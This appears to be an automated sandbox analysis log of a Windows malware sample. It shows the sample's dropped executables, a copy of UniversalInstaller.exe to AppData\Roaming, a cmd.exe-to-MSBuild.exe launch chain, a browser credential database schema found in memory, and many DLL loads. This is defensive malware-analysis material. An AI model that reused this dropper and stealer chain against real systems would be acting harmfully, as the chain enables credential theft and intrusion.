                            Source: u48o.0.exe, 0000000A.00000003.1360080869.00000000246F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1715925938.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                            Source: u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1715925938.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                            Source: zLwT7vCojz.exeReversingLabs: Detection: 39%
                            Source: zLwT7vCojz.exeVirustotal: Detection: 40%
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeFile read: C:\Users\user\Desktop\zLwT7vCojz.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\zLwT7vCojz.exe "C:\Users\user\Desktop\zLwT7vCojz.exe"
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeProcess created: C:\Users\user\AppData\Local\Temp\u48o.0.exe "C:\Users\user~1\AppData\Local\Temp\u48o.0.exe"
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeProcess created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe "C:\Users\user~1\AppData\Local\Temp\Qg_Appv5.exe"
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeProcess created: C:\Users\user\AppData\Local\Temp\u48o.1.exe "C:\Users\user~1\AppData\Local\Temp\u48o.1.exe"
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 1476
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeProcess created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe C:\Users\user~1\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeProcess created: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeProcess created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user~1\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 2020
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe "C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe"
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeProcess created: C:\Users\user\AppData\Local\Temp\u48o.0.exe "C:\Users\user~1\AppData\Local\Temp\u48o.0.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeProcess created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe "C:\Users\user~1\AppData\Local\Temp\Qg_Appv5.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeProcess created: C:\Users\user\AppData\Local\Temp\u48o.1.exe "C:\Users\user~1\AppData\Local\Temp\u48o.1.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeProcess created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe C:\Users\user~1\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeProcess created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user~1\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeProcess created: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: msimg32.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: msvcr100.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: pcacli.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: msimg32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: msvcr100.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: rstrtmgr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: mozglue.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: wsock32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: vcruntime140.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: msvcp140.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: vcruntime140.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: msimg32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: pla.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: pdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: tdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: shdocvw.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: wsock32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: winsta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: security.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: olepro32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: netapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: schedcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: msxml6.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: idndl.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: bitsproxy.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: dwmapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: msimg32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: oledlg.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: oleacc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: netapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: dwmapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: riched20.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: usp10.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: msls31.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: pla.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: pdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: tdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: shdocvw.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: msimg32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: oledlg.dllJump to behavior
